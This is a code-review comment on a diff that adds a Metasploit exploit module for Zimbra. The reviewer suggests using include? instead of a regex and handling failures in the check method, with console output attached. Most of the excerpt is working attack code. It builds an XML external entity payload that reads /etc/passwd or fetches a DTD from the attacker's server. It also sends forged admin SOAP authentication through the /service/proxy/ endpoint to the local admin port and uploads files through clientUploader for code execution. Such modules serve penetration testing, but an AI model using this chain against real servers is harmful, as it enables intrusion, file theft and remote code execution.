modules/exploits/linux/http/zimbra_xxe_rce.rb

```diff
@@ -0,0 +1,254 @@
+    req.elements['AcceptableResponseSchema'].text = sub
+
+    doc = rand_text_alpha_lower(4..8)
+    entity = rand_text_alpha_lower(4..8)
+    local_file = '/etc/passwd'
+
+    res = "<!DOCTYPE #{doc} [<!ELEMENT #{doc} ANY>"
+    if check_soap
+      local = "file://#{local_file}"
+      res << "<!ENTITY #{entity} SYSTEM '#{local}'>]>"
+      res << "#{xml.to_s.sub(sub, "&#{entity};")}"
+    else
+      local = "http://#{srvhost_addr}:#{srvport}#{@service_path}"
+      res << "<!ENTITY % #{entity} SYSTEM '#{local}'>"
+      res << "%#{entity};]>"
+      res << "#{xml.to_s.sub(sub, "&#{@ent_data};")}"
+    end
+    res
+  end
+
+  def soap_auth(zimbra_user, zimbra_pass, admin=true)
+    urn = admin ? 'urn:zimbraAdmin' : 'urn:zimbraAccount'
+    xml = Document.new
+
+    xml.add_element(
+      'soap:Envelope',
+      {'xmlns:soap'  => 'http://www.w3.org/2003/05/soap-envelope'}
+    )
+
+    xml.root.add_element('soap:Body')
+    body = xml.root.elements[1]
+    body.add_element(
+      'AuthRequest',
+      {'xmlns' => urn}
+    )
+
+    zimbra_acc = body.elements[1]
+    zimbra_acc.add_element(
+      'account',
+      {'by' => 'adminName'}
+    )
+    zimbra_acc.add_element('password')
+
+    zimbra_acc.elements['account'].text  = "#{zimbra_user}"
+    zimbra_acc.elements['password'].text = "#{zimbra_pass}"
+
+    xml.to_s
+  end
+
+  def cookie_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/soap/'),
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def proxy_req(data, auth_cookie)
+    target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/proxy/'),
+      'vars_get' => {'target' => target},
+      'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
+      'data' => data,
+      'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def upload_file(file_name, contents, cookie)
+    data = Rex::MIME::Message.new
+    data.add_part(file_name, nil, nil, 'form-data; name="filename1"')
+    data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"")
+    data.add_part("#{rand_text_numeric(2..5)}", nil, nil, 'form-data; name="requestId"')
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method'          => 'POST',
+      'uri'             => normalize_uri(target_uri, '/service/extension/clientUploader/upload'),
+      'ctype'           => 'multipart/form-data; boundary=' + data.bound,
+      'data'            => post_data,
+      'cookie'          => cookie
+    })
+  end
+
+  def check
+    res = xxe_req(soap_discover(true))
+    if res.body =~ /zimbra/
```

Comment:
`include?` if you're not using regex, please.

Also, I believe `xxe_req` can call `fail_with`, which means you'll want to handle exceptions in `check` in order to return a well-formed `CheckCode`.

```
msf5 exploit(linux/http/zimbra_xxe_rce) > check

[-] The connection was refused by the remote host (127.0.0.1:8443).
[-] Check failed: Msf::Exploit::Failed Request failed
msf5 exploit(linux/http/zimbra_xxe_rce) >
```